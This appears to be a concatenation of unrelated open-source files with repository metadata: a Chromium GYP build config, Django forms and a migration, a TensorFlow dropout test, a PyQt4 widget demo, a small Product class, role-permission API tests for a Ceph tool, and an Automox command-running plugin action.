'includes': ['../build/android/java_cpp_template.gypi'],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_library_process_type',
'type': 'none',
'variables': {
'source_file': 'android/library_loader/library_loader_hooks.h',
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_java
'target_name': 'base_java',
'type': 'none',
'variables': {
'java_in_dir': 'android/java',
'jar_excluded_classes': [ '*/NativeLibraries.class' ],
},
'dependencies': [
'base_java_application_state',
'base_java_library_load_from_apk_status_codes',
'base_java_library_process_type',
'base_java_memory_pressure_level',
'base_multidex_gen',
'base_native_libraries_gen',
'../third_party/android_tools/android_tools.gyp:android_support_multidex_javalib',
'../third_party/jsr-305/jsr-305.gyp:jsr_305_javalib',
],
'includes': [ '../build/java.gypi' ],
},
{
# GN: //base:base_java_unittest_support
'target_name': 'base_java_unittest_support',
'type': 'none',
'dependencies': [
'base_java',
],
'variables': {
'java_in_dir': '../base/test/android/java',
},
'includes': [ '../build/java.gypi' ],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_application_state',
'type': 'none',
'variables': {
'source_file': 'android/application_status_listener.h',
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_library_load_from_apk_status_codes',
'type': 'none',
'variables': {
'source_file': 'android/library_loader/library_load_from_apk_status_codes.h'
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_android_java_enums_srcjar
'target_name': 'base_java_memory_pressure_level',
'type': 'none',
'variables': {
'source_file': 'memory/memory_pressure_listener.h',
},
'includes': [ '../build/android/java_cpp_enum.gypi' ],
},
{
# GN: //base:base_java_test_support
'target_name': 'base_java_test_support',
'type': 'none',
'dependencies': [
'base_java',
'../testing/android/on_device_instrumentation.gyp:reporter_java',
],
'variables': {
'java_in_dir': '../base/test/android/javatests',
},
'includes': [ '../build/java.gypi' ],
},
{
# TODO(jbudorick): Remove this once we roll to robolectric 3.0 and pull
# in the multidex shadow library. crbug.com/522043
# GN: //base:base_junit_test_support
'target_name': 'base_junit_test_support',
'type': 'none',
'dependencies': [
'../testing/android/junit/junit_test.gyp:junit_test_support',
'../third_party/android_tools/android_tools.gyp:android_support_multidex_javalib',
],
'variables': {
'src_paths': [
'../base/test/android/junit/src/org/chromium/base/test/shadows/ShadowMultiDex.java',
],
},
'includes': [ '../build/host_jar.gypi' ]
},
{
# GN: //base:base_junit_tests
'target_name': 'base_junit_tests',
'type': 'none',
'dependencies': [
'base_java',
'base_java_test_support',
'base_junit_test_support',
'../testing/android/junit/junit_test.gyp:junit_test_support',
],
'variables': {
'main_class': 'org.chromium.testing.local.JunitTestMain',
'src_paths': [
'../base/android/junit/',
'../base/test/android/junit/src/org/chromium/base/test/util/DisableIfTest.java',
],
},
'includes': [ '../build/host_jar.gypi' ],
},
{
# GN: //base:base_javatests
'target_name': 'base_javatests',
'type': 'none',
'dependencies': [
'base_java',
'base_java_test_support',
],
'variables': {
'java_in_dir': '../base/android/javatests',
},
'includes': [ '../build/java.gypi' ],
},
{
# GN: //base/android/linker:chromium_android_linker
'target_name': 'chromium_android_linker',
'type': 'shared_library',
'sources': [
'android/linker/android_dlext.h',
'android/linker/legacy_linker_jni.cc',
'android/linker/legacy_linker_jni.h',
'android/linker/linker_jni.cc',
'android/linker/linker_jni.h',
'android/linker/modern_linker_jni.cc',
'android/linker/modern_linker_jni.h',
],
# The crazy linker is never instrumented.
'cflags!': [
'-finstrument-functions',
],
'dependencies': [
# The NDK contains the crazy_linker here:
# '<(android_ndk_root)/crazy_linker.gyp:crazy_linker'
# However, we use our own fork. See bug 384700.
'../third_party/android_crazy_linker/crazy_linker.gyp:crazy_linker',
],
},
{
# GN: //base:base_perftests_apk
'target_name': 'base_perftests_apk',
'type': 'none',
'dependencies': [
'base_perftests',
],
'variables': {
'test_suite_name': 'base_perftests',
},
'includes': [ '../build/apk_test.gypi' ],
},
{
# GN: //base:base_unittests_apk
'target_name': 'base_unittests_apk',
'type': 'none',
'dependencies': [
'base_java',
'base_unittests',
],
'variables': {
'test_suite_name': 'base_unittests',
'isolate_file': 'base_unittests.isolate',
},
'includes': [ '../build/apk_test.gypi' ],
},
],
'conditions': [
['test_isolation_mode != "noop"',
{
'targets': [
{
'target_name': 'base_unittests_apk_run',
'type': 'none',
'dependencies': [
'base_unittests_apk',
],
'includes': [
'../build/isolate.gypi',
],
'sources': [
'base_unittests_apk.isolate',
],
},
]
}
],
],
}],
['OS == "win"', {
'targets': [
{
# Target to manually rebuild pe_image_test.dll which is checked into
# base/test/data/pe_image.
'target_name': 'pe_image_test',
'type': 'shared_library',
'sources': [
'win/pe_image_test.cc',
],
'msvs_settings': {
'VCLinkerTool': {
'SubSystem': '2', # Set /SUBSYSTEM:WINDOWS
'DelayLoadDLLs': [
'cfgmgr32.dll',
'shell32.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'shell32.lib',
],
},
},
},
],
}],
['test_isolation_mode != "noop"', {
'targets': [
{
'target_name': 'base_unittests_run',
'type': 'none',
'dependencies': [
'base_unittests',
],
'includes': [
'../build/isolate.gypi',
],
'sources': [
'base_unittests.isolate',
],
},
],
}],
],
}
| [
"Justin"
] | Justin |
00c249df496d497a62d7988f77d4d095b9b8644e | 925f6b2376bcdcf175194b4f390beeffb57d67e0 | /sosmypc/sosmypc/core/forms.py | c69f02eae6de9e7a5494462446fa674876afd469 | [] | no_license | CoutinhoElias/sosmypc | a0a86f0c05f5f0d6e0beb3a7b22da73ed8951ac4 | ce77520f0e7fe33441de030f85c85c4fccce8afb | refs/heads/master | 2021-01-18T23:21:22.377626 | 2016-06-02T18:07:27 | 2016-06-02T18:07:27 | 53,994,124 | 1 | 1 | null | 2016-05-18T19:29:35 | 2016-03-16T02:23:09 | JavaScript | UTF-8 | Python | false | false | 6,118 | py | import datetime as datetime
from django import forms
from django.contrib.auth.forms import UserCreationForm
from material import Layout, Row, Fieldset, Span3, Span2, Span10, Span8, Span7, Span5
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout
from .models import ProfissoesPessoa, Qualificacao
from django_addanother.widgets import AddAnotherWidgetWrapper
from django.core.urlresolvers import reverse_lazy
class LoginForm(forms.Form):
username = forms.CharField(max_length=30,label="Nome")
email = forms.EmailField(label="E-mail")
password = forms.CharField(widget=forms.PasswordInput,label="Senha")
class RegistrationForm(forms.Form, UserCreationForm):
username = forms.CharField(max_length=30,required=True,label='Login')
email = forms.EmailField(label="E-mail",required=True)
#senha = forms.CharField(widget=forms.PasswordInput,label='Senha')
#confirma_senha = forms.CharField(widget=forms.PasswordInput, label="Confirmar senha")
nome = forms.CharField(required=True,label='Nome Completo')
cep = forms.IntegerField(max_value=99999999,required=True,label='CEP')
#tipo_logradouro = forms.CharField(required=True,label='Tipo')
logradouro = forms.CharField(required=True,label='Logradouro')
numero = forms.CharField(required=True,label='Número')
bairro = forms.CharField(required=True,label='Bairro')
cidade = forms.CharField(required=True,label='Cidade')
estado = forms.CharField(required=True,label='UF')
#last_name = forms.CharField(required=True, label='Último nome')
#gender = forms.ChoiceField(choices=((None, ''), ('F', 'Feminino'), ('M', 'Masculino'), ('O', 'Outro')),label='Gênero',required=False)
profissional = forms.BooleanField(required=False, label='Sou profissional.')
agree_toc = forms.BooleanField(required=True, label='Eu aceito os termos e condições de uso.')
layout = Layout(
Fieldset('Cadastrar em SOS my PC',
'username','email',
Row('password1', 'password2')),
Fieldset('Dados Pessoais','nome',
Row(Span2('cep'),# Span2('tipo_logradouro'),
Span8('logradouro'),Span2('numero')),
Row(Span5('bairro'),Span5('cidade'),Span2('estado')) ),
'profissional', 'agree_toc')
class CommentForm(forms.Form):
nome = forms.CharField(required=True,label='Nome Completo')
email=forms.EmailField(label="E-mail",required=True)
mensagem=forms.CharField(required=True,label='Comentário',widget=forms.Textarea)
class UserForm(forms.Form):
username = forms.CharField(label="Nome usuário", max_length=32, widget=forms.TextInput(
attrs={'class': 'form-control input-lg'}))
email = forms.EmailField(max_length=32, widget=forms.EmailInput(
attrs={'class': 'form-control input-lg'}))
#password = forms.CharField(label="Senha", max_length=32, widget=forms.PasswordInput(
#attrs={'class': 'form-control input-lg'}))
first_name = forms.CharField(label="Primeiro nome", max_length=32, widget=forms.TextInput(
attrs={'class': 'form-control input-lg'}))
last_name = forms.CharField(label="Sobrenome", max_length=32, widget=forms.TextInput(
attrs={'class': 'form-control input-lg'}))
is_staff = forms.BooleanField(label="É usuário do sistema?", initial=False)
is_superuser = forms.BooleanField(label="É Administrador do sistema?", initial=False)
class ProfissaoForm(forms.Form):#Atualmente sem uso.
profissao = forms.CharField(max_length=30,label="Profissao")
class ProfissoesPessoaForm(forms.Form): #Atualmente sem uso.
pessoa = forms.CharField(max_length=30,label="Pessoa")
profissao = forms.CharField(max_length=30,label="Profissao")
rating = forms.IntegerField(label="Rating")
layout = Layout(
'pessoa',
Row('profissao', 'rating'))
# @property #Trabalhando com modal | Primeiro declara esta função abaixo:
# def helper(self):
# helper = FormHelper()
# helper.form_tag = False # don't render form DOM element
# helper.render_unmentioned_fields = True # render all fields
# helper.label_class = 'col-md-2'
# helper.field_class = 'col-md-10'
# return helper
class ProfissoesPessoaModelForm(forms.ModelForm):
class Meta:
model = ProfissoesPessoa
fields = '__all__'
layout = Layout(
'pessoa',
Row('profissao', 'rating'))
# class QualificacaoModelForm(forms.ModelForm):
# class Meta:
# model = Qualificacao
# fields = ['descricao']
# widgets = {
# 'groups': AddAnotherWidgetWrapper(
# forms.SelectMultiple,
# reverse_lazy('add_qualificacao'),
# )
# }
"""Passos para trabalhar com django rest
1 - pip install djangorestframework
2 - pip instal httpie
3 - No Setting do projeto antes de suas apps insira 'rest_framework',
4 - No urls.py chame assim:
url(r'^pessoas/all/', all_pessoas)
5 - Na pasta do projeto (Neste caso a pasta core onde se encontram os arquivos views, forms, apps e models.py
vamos criar um arquivo chamado serializers.py
Neste arquivo vamos colocar o código abaixo:
from rest_framework import serializers
from core.models import *
class PessoaSerializer(serializes. ModelSerializer):
class Meta:
model = Pessoa
fields = ('pk', ...)
Repita isso para cada classe do models.py
6 - Na views.py vamos fazer os seguintes passos:
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from rest_framework.renderes import JSONRenderer
from rest_framework.renderes import Response
from rest_framework.decorators import api_view
from Pessoa.serializers import *
@api_view(['GET'])
def all_Pessoas(request, **kwargs):
pessoas = Pessoa.objects.all()
serializers = PessoaSerializer(pessoas, many=True)
return Response(serializers.data)
"""
| [
"coutinho.elias@gmail.com"
] | coutinho.elias@gmail.com |
cd9eca8fdea4985097b9053005381853c3e81a01 | 49536aafb22a77a6caf249c7fadef46d63d24dfe | /tensorflow/tensorflow/contrib/nn/python/ops/alpha_dropout_test.py | a46269392668d58794c05b147c0b616940dd905c | [
"Apache-2.0"
] | permissive | wangzhi01/deeplearning-1 | 4e5ad93f0d9ecd302b74352f80fe1fa6ae70bf0d | 46ab82253d956953b8aa98e97ceb6cd290e82288 | refs/heads/master | 2020-05-28T03:14:55.687567 | 2018-09-12T16:52:09 | 2018-09-12T16:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,629 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sampling_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.nn.python.ops.alpha_dropout import alpha_dropout
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.platform import test
class AlphaDropoutTest(test.TestCase):
def testAlphaDropout(self):
x_dim, y_dim = 40, 30
for keep_prob in [0.1, 0.5, 0.8]:
with self.test_session():
t = random_ops.random_normal([x_dim, y_dim])
output = alpha_dropout(t, keep_prob)
self.assertEqual([x_dim, y_dim], output.get_shape())
t_mean, t_std = nn_impl.moments(t, axes=[0, 1])
output_mean, output_std = nn_impl.moments(output, axes=[0, 1])
self.assertLess(abs(t_mean.eval() - output_mean.eval()), 0.1)
self.assertLess(abs(t_std.eval() - output_std.eval()), 0.1)
def testShapedDropoutShapeError(self):
# Runs shaped dropout and verifies an error is thrown on misshapen noise.
x_dim = 40
y_dim = 30
keep_prob = 0.5
t = constant_op.constant(1.0, shape=[x_dim, y_dim], dtype=dtypes.float32)
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim, y_dim + 10])
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim, y_dim, 5])
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim + 3])
with self.assertRaises(ValueError):
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim])
# test that broadcasting proceeds
_ = alpha_dropout(t, keep_prob, noise_shape=[y_dim])
_ = alpha_dropout(t, keep_prob, noise_shape=[1, y_dim])
_ = alpha_dropout(t, keep_prob, noise_shape=[x_dim, 1])
_ = alpha_dropout(t, keep_prob, noise_shape=[1, 1])
def testInvalidKeepProb(self):
x_dim, y_dim = 40, 30
t = constant_op.constant(1.0, shape=[x_dim, y_dim], dtype=dtypes.float32)
with self.assertRaises(ValueError):
alpha_dropout(t, -1.0)
with self.assertRaises(ValueError):
alpha_dropout(t, 1.1)
with self.assertRaises(ValueError):
alpha_dropout(t, [0.0, 1.0])
with self.assertRaises(ValueError):
alpha_dropout(t, array_ops.placeholder(dtypes.float64))
with self.assertRaises(ValueError):
alpha_dropout(t, array_ops.placeholder(dtypes.float32, shape=[2]))
def testNoDropoutFast(self):
x = array_ops.zeros((5,))
for p in 1, constant_op.constant(1.0):
y = alpha_dropout(x, keep_prob=p)
self.assertTrue(x is y)
if __name__ == '__main__':
test.main()
| [
"hanshuobest@163.com"
] | hanshuobest@163.com |
b275fe795cf9ab1470d80878cc1dcd2f8bff4dfb | 2e7fa13a40dafa81c5852b7a9d70555c45814574 | /QT/pyqt/Qline_Edit.py | 84efff4077167ce8cc0584f2f562a6c1388a02b6 | [] | no_license | Ziaeemehr/miscellaneous | 5768c6f5a2fe76468faed4283a3572a44ccd0239 | 43a62aaa28c577b09f605a135818a2dacc75d67c | refs/heads/master | 2021-07-24T02:43:51.032849 | 2020-09-23T06:17:17 | 2020-09-23T06:17:17 | 217,556,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,161 | py | import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
def window():
app = QApplication(sys.argv)
win = QWidget()
e1 = QLineEdit()
e1.setValidator(QIntValidator())
e1.setMaxLength(4)
e1.setAlignment(Qt.AlignRight)
e1.setFont(QFont("Arial",20))
e2 = QLineEdit()
e2.setValidator(QDoubleValidator(0.99,99.99,2))
flo = QFormLayout()
flo.addRow("integer validator", e1)
flo.addRow("Double validator",e2)
e3 = QLineEdit()
e3.setInputMask('+99_9999_999999')
flo.addRow("Input Mask",e3)
e4 = QLineEdit()
e4.textChanged.connect(textchanged)
flo.addRow("Text changed",e4)
e5 = QLineEdit()
e5.setEchoMode(QLineEdit.Password)
flo.addRow("Password",e5)
e6 = QLineEdit("Hello Python")
e6.setReadOnly(True)
flo.addRow("Read Only",e6)
e5.editingFinished.connect(enterPress)
win.setLayout(flo)
win.setWindowTitle("PyQt")
win.show()
sys.exit(app.exec_())
def textchanged(text):
print "contents of text box: "+text
def enterPress():
print "edited"
if __name__ == '__main__':
window() | [
"a.ziaeemehr@gmail.com"
] | a.ziaeemehr@gmail.com |
7be4d69ad6872e1ec239fc9e76020f4128811aa0 | a0f7cd0dac6b24ca8f0eb26e13f55e7d3bfd6073 | /tutorgame/regexapp/migrations/0001_initial.py | 5fcf0d31f6456839a59a6d71d3b5d49dd99c32ce | [] | no_license | tomaccosheep/capstone-draft-7 | 217d0e279c7a3a25207f084ee5f148de5815fe0c | 0a66c24397d2c0d4878a057c6bdd21a1009b15b6 | refs/heads/master | 2021-01-22T17:49:05.881406 | 2017-08-14T19:00:19 | 2017-08-14T19:00:19 | 102,405,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-13 18:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Card_Manager',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique_id', models.CharField(max_length=32)),
],
),
]
| [
"al.burns.email@gmail.com"
] | al.burns.email@gmail.com |
a8ff5cf0bc6c164790c98a11d4fee5fbabbc3acc | 669be04e813baf7ac5a444ff9197237a8674126d | /product.py | 0fec1a80bb34ec37fb8020167d1acab1e59d7db0 | [] | no_license | vangali12/PythonOOP | d24d588eddfa6b03919dd6735b8bf3c898630425 | 579d365981b9d1520ec88dcbfe52147745be94ef | refs/heads/master | 2021-07-08T04:07:00.184547 | 2017-10-05T19:07:37 | 2017-10-05T19:07:37 | 105,929,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | class Product(object):
def __init__(self, price, name, weight, brand, cost):
self.price = price
self.name = name
self.weight = weight
self.brand = brand
self.cost = cost
self.status = "sale"
def sell(self):
self.status = "sold"
return self
def addTax(self, tax):
self.price = self.price + (self.price * tax)
return self
def returnItem(self, reason):
if (reason is "defective"):
self.status = "defective"
self.price = 0
return self
if (reason is "new"):
self.status = "sale"
return self
if (reason is "opened"):
self.status = "used"
self.price = float((self.price * 0.8))
return self
def displayInfo(self):
print("Price: " + str(self.price))
print("Name: " + self.name)
print("Weight: " + self.weight)
print("Brand " + self.brand)
print("Cost: " + str(self.cost))
print("Status: " + self.status)
#item1 = Product(21, "strawberries", "1lb", "Driscoll's", 5)
#item1.displayInfo()
#item1.sell().displayInfo()
#item1.addTax(0.1).displayInfo()
#item1.returnItem("defective").displayInfo()
#item1.returnItem("new").displayInfo()
#item1.returnItem("opened").displayInfo() | [
"30483940+vangali12@users.noreply.github.com"
] | 30483940+vangali12@users.noreply.github.com |
311c308c4f86c1fc335a834b79971196dc1408b7 | f000fa4e6ef1de9591eeabff43ba57b7bf32561d | /tests/api/views/v1/test_api_role.py | 93c7a8cc9a38f118dfa72b73518a74bbaa4126b7 | [] | no_license | VictorDenisov/ceph-lcm | 1aca07f2d17bfda8760d192ffd6d17645705b6e4 | 3cfd9ced6879fca1c39039e195d22d897ddcde80 | refs/heads/master | 2021-01-15T09:19:23.723613 | 2016-09-17T01:18:45 | 2016-09-17T01:18:45 | 68,424,913 | 0 | 0 | null | 2016-09-17T01:17:36 | 2016-09-17T01:17:36 | null | UTF-8 | Python | false | false | 10,881 | py | # -*- coding: utf-8 -*-
"""This module has tests for /v1/role API."""
import uuid
import pytest
from cephlcm.common.models import role
@pytest.fixture
def mongo_collection(pymongo_connection):
return pymongo_connection.db.role
@pytest.fixture
def clean_role_collection(mongo_collection, sudo_role):
mongo_collection.remove({"_id": {"$ne": sudo_role._id}})
@pytest.fixture
def valid_request(sudo_role):
return {
"name": pytest.faux.gen_alphanumeric(),
"permissions": sudo_role.permissions
}
def add_permission_to_user(client, user_model, permissions):
role_data = user_model.role.make_api_structure()
role_data["data"]["permissions"] = permissions
response = client.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 200
@pytest.fixture
def normal_user_with_role(normal_user, sudo_user):
new_role = role.RoleModel.make_role(pytest.faux.gen_alphanumeric(), [],
sudo_user.model_id)
normal_user.role_id = new_role.model_id
normal_user.save()
return normal_user
def test_api_get_access(sudo_client_v1, client_v1, sudo_user, freeze_time):
response = client_v1.get("/v1/role/")
assert response.status_code == 401
assert response.json["error"] == "Unauthorized"
response = sudo_client_v1.get("/v1/role/")
assert response.status_code == 200
def test_api_create_model(client_v1, sudo_client_v1, valid_request,
mongo_collection, sudo_user, freeze_time):
response = client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 401
assert response.json["error"] == "Unauthorized"
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 200
db_role = mongo_collection.find_one({"model_id": response.json["id"]})
assert db_role
assert response.json["id"] == db_role["model_id"]
assert response.json["initiator_id"] == db_role["initiator_id"]
assert response.json["time_updated"] == db_role["time_created"]
assert response.json["time_deleted"] == db_role["time_deleted"]
assert response.json["version"] == db_role["version"]
assert response.json["data"]["name"] == db_role["name"]
assert response.json["data"]["permissions"] == db_role["permissions"]
assert response.json["time_updated"] == int(freeze_time.return_value)
assert response.json["initiator_id"] == sudo_user.model_id
assert response.json["model"] == "role"
assert response.json["version"] == 1
assert response.json["data"]["name"] == valid_request["name"]
assert response.json["data"]["permissions"] == valid_request["permissions"]
@pytest.mark.parametrize("name", (1, {}, [], None))
def test_api_create_broken_parameter(name, sudo_client_v1, valid_request):
valid_request["name"] = name
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 400
@pytest.mark.parametrize("prm", (1, str(uuid.uuid4()), {}, [], None))
def test_api_create_role_broken_permission(prm, sudo_client_v1, valid_request):
valid_request["permissions"]["api"].append(prm)
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 400
def test_api_create_role_unknown_class(sudo_client_v1, sudo_role,
valid_request):
valid_request["permissions"][pytest.faux.gen_alpha()] = []
response = sudo_client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 400
def test_add_permission_to_role(client_v1, sudo_client_v1, sudo_role,
valid_request):
valid_request["permissions"]["api"] = []
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
model["data"]["permissions"]["api"] = [sudo_role.permissions["api"][0]]
resp = client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 401
resp = sudo_client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 200
assert resp.json["id"] == response.json["id"]
assert resp.json["version"] == response.json["version"] + 1
assert resp.json["data"] == model["data"]
def test_remove_permission_from_role(client_v1, sudo_client_v1, sudo_role,
valid_request):
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
model["data"]["permissions"]["api"] = [sudo_role.permissions["api"][0]]
resp = client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 401
resp = sudo_client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 200
assert resp.json["id"] == response.json["id"]
assert resp.json["version"] == response.json["version"] + 1
assert resp.json["data"] == model["data"]
def test_update_name(client_v1, sudo_client_v1, valid_request):
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
model["data"]["name"] = pytest.faux.gen_alphanumeric()
resp = client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 401
resp = sudo_client_v1.put(
"/v1/role/{0}/".format(response.json["id"]), data=model
)
assert resp.status_code == 200
assert resp.json["id"] == response.json["id"]
assert resp.json["version"] == response.json["version"] + 1
assert resp.json["data"] == model["data"]
def test_add_permission_to_user_view_user(
client_v1, sudo_client_v1, normal_user_with_role, sudo_role, valid_request
):
client_v1.login(normal_user_with_role.login, "qwerty")
response = client_v1.get("/v1/role/")
assert response.status_code == 403
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 403
add_permission_to_user(
sudo_client_v1, normal_user_with_role, {
"api": ["view_role", "view_role_versions"]
}
)
response = client_v1.get("/v1/role/")
assert response.status_code == 200
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 200
def test_add_role_to_user_view_user(
client_v1, sudo_client_v1, normal_user_with_role, sudo_role, valid_request
):
client_v1.login(normal_user_with_role.login, "qwerty")
response = client_v1.get("/v1/role/")
assert response.status_code == 403
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 403
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 403
normal_user_with_role.role_id = sudo_role.model_id
normal_user_with_role.save()
response = client_v1.get("/v1/role/")
assert response.status_code == 200
response = client_v1.get("/v1/role/{0}/".format(sudo_role.model_id))
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/".format(sudo_role.model_id)
)
assert response.status_code == 200
response = client_v1.get(
"/v1/role/{0}/version/1/".format(sudo_role.model_id)
)
assert response.status_code == 200
def test_add_permission_to_create_user(client_v1, sudo_client_v1, sudo_role,
normal_user_with_role, valid_request):
client_v1.login(normal_user_with_role.login, "qwerty")
response = client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 403
add_permission_to_user(
sudo_client_v1, normal_user_with_role,
{"api": ["view_role", "create_role"]}
)
response = client_v1.post("/v1/role/", data=valid_request)
assert response.status_code == 200
def test_add_permission_to_edit_user(client_v1, sudo_client_v1, sudo_role,
normal_user_with_role, valid_request):
client_v1.login(normal_user_with_role.login, "qwerty")
role_data = normal_user_with_role.role.make_api_structure()
role_data["data"]["permissions"] = {"api": ["edit_role"]}
response = client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 403
response = sudo_client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 200
role_data = response.json
response = client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 403
role_data["data"]["permissions"]["api"].append("view_role")
response = sudo_client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
role_data = response.json
response = client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 200
def test_add_permission_to_delete_user(client_v1, sudo_client_v1, sudo_role,
normal_user_with_role, valid_request):
client_v1.login(normal_user_with_role.login, "qwerty")
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
response = client_v1.delete("/v1/role/{0}/".format(model["id"]))
assert response.status_code == 403
add_permission_to_user(
sudo_client_v1, normal_user_with_role,
{"api": ["view_role", "delete_role"]}
)
def test_delete_role_with_active_user(sudo_client_v1, normal_user_with_role):
role_data = normal_user_with_role.role.make_api_structure()
response = sudo_client_v1.delete("/v1/role/{0}/".format(role_data["id"]))
assert response.status_code == 400
normal_user_with_role.delete()
response = sudo_client_v1.delete("/v1/role/{0}/".format(role_data["id"]))
assert response.status_code == 200
| [
"sarkhipov@mirantis.com"
] | sarkhipov@mirantis.com |
0a27983665eca4c578a5013cd7157737e2c6dec8 | c9500ad778b8521aaa85cb7fe3239989efaa4799 | /plugins/automox/icon_automox/actions/run_command/action.py | c10f2f3ba76d3af402ecb5308a617e712b5da48f | [
"MIT"
] | permissive | rapid7/insightconnect-plugins | 5a6465e720f114d71b1a82fe14e42e94db104a0b | 718d15ca36c57231bb89df0aebc53d0210db400c | refs/heads/master | 2023-09-01T09:21:27.143980 | 2023-08-31T10:25:36 | 2023-08-31T10:25:36 | 190,435,635 | 61 | 60 | MIT | 2023-09-14T08:47:37 | 2019-06-05T17:05:12 | Python | UTF-8 | Python | false | false | 1,408 | py | import insightconnect_plugin_runtime
from .schema import RunCommandInput, RunCommandOutput, Input, Output, Component
# Custom imports below
class RunCommand(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="run_command", description=Component.DESCRIPTION, input=RunCommandInput(), output=RunCommandOutput()
)
def run(self, params={}):
policy_id = params.get(Input.POLICY_ID)
command = params.get(Input.COMMAND)
command_payload = {"command_type_name": command}
# Craft command and argument based on inputs which vary based on command being run
if command == "InstallUpdate":
command_payload["args"] = params.get(Input.PATCHES)
elif command == "PolicyTest":
command_payload["command_type_name"] = f"policy_{policy_id}_test"
elif command == "PolicyRemediate":
command_payload["command_type_name"] = f"policy_{policy_id}_remediate"
self.logger.info(
f"Running {command_payload['command_type_name']} command with the following "
f"arguments: {command_payload.get('args', 'No arguments defined')}"
)
self.connection.automox_api.run_device_command(
params.get(Input.ORG_ID), params.get(Input.DEVICE_ID), command_payload
)
return {Output.SUCCESS: True}
| [
"noreply@github.com"
] | rapid7.noreply@github.com |
9a42e5f17ab99a99ebc15ec69c703a5a312f984f | 2c4648efe8c7e408b8c3a649b2eed8bb846446ec | /codewars/Python/8 kyu/ValidateCodeWithSimpleRegex/validate_code_test.py | 8aefdd9d13dd8eab5601b43efe0c1ecca12ebe4b | [] | no_license | Adasumizox/ProgrammingChallenges | 9d79bd1b0ce4794b576124f9874aabb86d5c0713 | 3630fcde088d7991e344eb1b84805e9e756aa1a2 | refs/heads/master | 2021-07-16T08:16:57.538577 | 2020-07-19T19:58:28 | 2020-07-19T19:58:28 | 190,159,085 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | from validate_code import validate_code
import unittest
